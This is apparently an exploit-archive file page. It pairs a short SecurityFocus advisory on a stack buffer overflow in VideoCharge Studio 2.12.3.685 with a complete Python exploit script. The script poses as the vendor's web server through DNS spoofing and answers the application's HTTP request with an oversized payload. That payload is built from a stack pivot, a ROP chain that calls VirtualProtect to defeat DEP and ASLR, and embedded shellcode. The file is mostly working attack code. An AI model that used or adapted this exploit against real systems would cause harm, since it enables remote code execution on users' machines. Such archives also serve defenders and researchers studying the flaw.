134 lines
No EOL
4.8 KiB
Python
Executable file
134 lines
No EOL
4.8 KiB
Python
Executable file
source: https://www.securityfocus.com/bid/65685/info
|
|
|
|
VideoCharge Studio is prone to a remote stack-based buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
|
|
|
|
Successful exploits allow remote attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts likely result in denial-of-service conditions.
|
|
|
|
VideoCharge Studio 2.12.3.685 is vulnerable; other versions may also be affected.
|
|
|
|
#!/usr/bin/python
|
|
# Exploit Title: VideoCharge Studio v2.12.3.685 cc.dll GetHttpResponse()
|
|
MITM Remote Code Execution Exploit (SafeSEH/ASLR/DEP Bypass)
|
|
# Version: v2.12.3.685
|
|
# Date: 2014-02-18
|
|
# Author: Julien Ahrens (@MrTuxracer)
|
|
# Homepage: http://www.rcesecurity.com
|
|
# Software Link: http://www.videocharge.com
|
|
# Tested on: Win7-GER (DEP enabled)
|
|
#
|
|
# Howto / Notes:
|
|
# Since it's a MITM RCE you need to spoof the DNS Record for
|
|
www.videocharge.com in order to successfully exploit this vulnerability
|
|
#
|
|
|
|
from socket import *
|
|
from struct import pack
|
|
from time import sleep
|
|
|
|
host = "192.168.0.1"
|
|
port = 80
|
|
|
|
s = socket(AF_INET, SOCK_STREAM)
|
|
s.bind((host, port))
|
|
s.listen(1)
|
|
print "\n[+] Listening on %d ..." % port
|
|
|
|
cl, addr = s.accept()
|
|
print "[+] Connection accepted from %s" % addr[0]
|
|
|
|
# Thanks Giuseppe D'Amore for the amazing shellcode
|
|
# http://www.exploit-db.com/exploits/28996/
|
|
shellcode =
|
|
("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"+
|
|
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"+
|
|
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"+
|
|
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"+
|
|
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"+
|
|
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"+
|
|
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"+
|
|
"\x49\x0b\x31\xc0\x51\x50\xff\xd7")
|
|
|
|
junk0 = "\x90" * 1277
|
|
junk1 = "\x90" * 1900
|
|
nops="\x90" * 30
|
|
jmpesp=pack('<L',0x102340e8) * 5 # jmp esp | {PAGE_EXECUTE_READ}
|
|
[cc.dll]
|
|
|
|
# jump to controlled memory
|
|
eip=pack('<L',0x61b84af1) # {pivot 4124 / 0x101c} # ADD ESP,101C # RETN
|
|
[zlib1.dll]
|
|
|
|
#
|
|
# ROP registers structure:
|
|
# EBP - VirtualProtect() call
|
|
# ESP - lpAddress
|
|
# EBX - dwSize
|
|
# EDX - flNewProtect
|
|
# ECX - lpflOldProtect
|
|
#
|
|
|
|
# Craft VirtualProtect() call (0x0080D816) via [DE2D66F9 XOR DEADBEEF]
|
|
and MOV to EBP
|
|
rop = pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll]
|
|
rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
|
|
rop += pack('<L',0xDE2D66F9) # XOR param 1
|
|
rop += pack('<L',0x10206ac5) # POP EBX # RETN [cc.dll]
|
|
rop += pack('<L',0xDEADBEEF) # XOR param 2
|
|
rop += pack('<L',0x1002fb27) # XOR EDI,EBX # ADD DL,BYTE PTR DS:[EAX] #
|
|
RETN [cc.dll]
|
|
rop += pack('<L',0x101f7572) # MOV EAX,EDI # POP EDI # RETN [cc.dll]
|
|
rop += pack('<L',0xDEADBEEF) # Filler
|
|
rop += pack('<L',0x101fbc62) # XCHG EAX,EBP # RETN [cc.dll]
|
|
|
|
# Craft VirtualProtect() dwSize in EAX and MOV to EBX
|
|
rop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll]
|
|
rop += pack('<L',0x101f2adc) # ADD EAX,500 # RETN [cc.dll]
|
|
rop += pack('<L',0x1023ccfb) # XCHG EAX,EBX # RETN [cc.dll]
|
|
|
|
# Craft VirtualProtect() flNewProtect in EAX and MOV to EDX
|
|
rop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll]
|
|
rop += pack('<L',0x102026a1) # ADD EAX,25 # RETN [cc.dll]
|
|
rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll]
|
|
rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll]
|
|
rop += pack('<L',0x102026b1) # ADD EAX,3 # RETN [cc.dll]
|
|
rop += pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll]
|
|
rop += pack('<L',0x61b90402) # MOV EDX,ECX # RETN [zlib1.dll]
|
|
|
|
# Put writable offset for VirtualProtect() lpflOldProtect to ECX
|
|
rop += pack('<L',0x1020aacf) # POP ECX # RETN [cc.dll]
|
|
rop += pack('<L',0x61B96180) # writable location [zlib1.dll]
|
|
|
|
# POP a value from the stack after PUSHAD and POP value to ESI
|
|
# as a preparation for the VirtualProtect() call
|
|
rop += pack('<L',0x61b850a4) # POP ESI # RETN [zlib1.dll]
|
|
rop += pack('<L',0x61B96180) # writable location from [zlib1.dll]
|
|
rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
|
|
rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
|
|
|
|
# Achievement unlocked: PUSHAD
|
|
rop += pack('<L',0x101e93d6) # PUSHAD # RETN [cc.dll]
|
|
rop += pack('<L',0x102340c5) # jmp esp | {PAGE_EXECUTE_READ} [cc.dll]
|
|
|
|
payload = junk0 + eip + junk1 + rop + jmpesp + nops + shellcode
|
|
|
|
buffer = "HTTP/1.1 200 OK\r\n"
|
|
buffer += "Date: Sat, 09 Feb 2014 13:33:37 GMT\r\n"
|
|
buffer += "Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with
|
|
Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g\r\n"
|
|
buffer += "X-Powered-By: PHP/5.2.6-1+lenny16\r\n"
|
|
buffer += "Vary: Accept-Encoding\r\n"
|
|
buffer += "Content-Length: 4000\r\n"
|
|
buffer += "Connection: close\r\n"
|
|
buffer += "Content-Type: text/html\r\n\r\n"
|
|
buffer += payload
|
|
buffer += "\r\n"
|
|
|
|
print cl.recv(1000)
|
|
|
|
cl.send(buffer)
|
|
|
|
print "[+] Sending exploit: OK\n"
|
|
|
|
sleep(3)
|
|
cl.close()
|
|
s.close() |